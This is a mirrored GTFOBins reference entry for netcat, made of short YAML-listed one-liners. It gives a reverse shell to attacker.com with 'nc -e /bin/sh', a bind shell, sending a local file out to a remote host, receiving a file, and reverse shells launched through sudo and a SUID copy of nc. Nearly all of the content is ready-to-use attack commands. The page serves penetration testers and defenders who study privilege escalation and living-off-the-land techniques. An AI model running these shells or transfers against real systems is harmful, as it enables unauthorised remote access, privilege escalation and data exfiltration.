mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-25 23:06:47 +02:00 
			
		
		
		
	
		
			
				
	
	
		
			40 lines
		
	
	
		
			1.4 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
			
		
		
	
	
			40 lines
		
	
	
		
			1.4 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
| ---
 | |
| functions:
 | |
|   reverse-shell-interactive:
 | |
|     - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
 | |
|       code: |
 | |
|         RHOST=attacker.com
 | |
|         RPORT=12345
 | |
|         nc -e /bin/sh $RHOST $RPORT
 | |
|   bind-shell-interactive:
 | |
|     - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
 | |
|       code: |
 | |
|         LPORT=12345
 | |
|         nc -l -p $LPORT -e /bin/sh
 | |
|   upload:
 | |
|     - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
 | |
|       code: |
 | |
|         RHOST=attacker.com
 | |
|         RPORT=12345
 | |
|         LFILE=file_to_send
 | |
|         nc $RHOST $RPORT < "$LFILE"
 | |
|   download:
 | |
|     - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
 | |
|       code: |
 | |
|         LPORT=12345
 | |
|         LFILE=file_to_save
 | |
|         nc -l -p $LPORT > "$LFILE"
 | |
|   sudo-enabled:
 | |
|     - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
 | |
|       code: |
 | |
|         RHOST=attacker.com
 | |
|         RPORT=12345
 | |
|         sudo nc -e /bin/sh $RHOST $RPORT
 | |
|   suid-limited:
 | |
|     - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
 | |
|       code: |
 | |
|         RHOST=attacker.com
 | |
|         RPORT=12345
 | |
|         ./nc -e /bin/sh $RHOST $RPORT
 | |
| ---
 |